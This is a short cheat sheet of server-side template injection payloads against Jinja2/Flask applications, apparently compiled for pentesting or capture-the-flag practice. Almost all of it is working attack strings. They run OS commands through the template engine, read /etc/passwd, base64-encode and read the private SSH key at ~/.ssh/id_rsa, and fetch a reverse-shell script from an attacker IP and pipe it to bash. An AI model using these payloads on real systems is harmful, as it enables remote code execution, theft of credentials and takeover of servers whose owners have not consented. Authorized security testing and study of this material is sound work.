cheat sheet Jinja2 python or flask SSTI vulnerability payload
1. {{2*2}} or {{7*7}}
[+] Desc : Testing, check or enum this vulnerability
2. {{request.application.__globals__.__builtins__.__import__('os').popen('cat [your path destination]').read()}}
[+] Desc : Opening and read your path destination
3. {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
[+] Desc : Get id. used to find out user and group names and numeric ID's (UID or group ID) of the current user or any other user
4. {{request.application.__globals__.__builtins__.__import__("os").popen('cat /etc/passwd').read()}}
[+] Desc : Get or read the directory value in path /etc/passwd. A text file that describes user login accounts for the system. It should have read permission, system inforamtion and any
5. {{request.application.__globals__.__builtins__.__import__("os").popen('cat ~/.ssh/id_rsa | base64').read()}}
[+] Desc : Get and read or open path .ssh get id_rsa then encode using base64
6. {{request.application.__globals__.__builtins__.__import__('os').popen('ls -a').read()}}
[+] Desc : Get directory and hidden directory or file
7. {{request.application.__globals__.__builtins__.__import__('os').popen('curl IP/revshell | bash').read()}}
[+] Desc : Jinja revshell. Make sure sett your ip and port then listen in netcat
-
https://portswigger.net/web-security/server-side-template-injection
-
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- Hack the Box